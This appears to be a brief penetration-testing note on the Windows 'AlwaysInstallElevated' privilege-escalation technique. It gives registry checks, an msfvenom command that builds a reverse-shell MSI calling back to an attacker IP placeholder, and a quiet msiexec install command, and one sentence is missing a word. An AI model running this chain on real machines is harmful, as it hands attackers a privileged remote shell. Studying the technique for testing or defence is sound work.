Always Install

This vulnerability happens when the windows installer file is run with high privilege. These two entries should be set.

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Then we can upload a malicious msi file on the target.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi

Finally we the msi file.

C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Last updated 9 months ago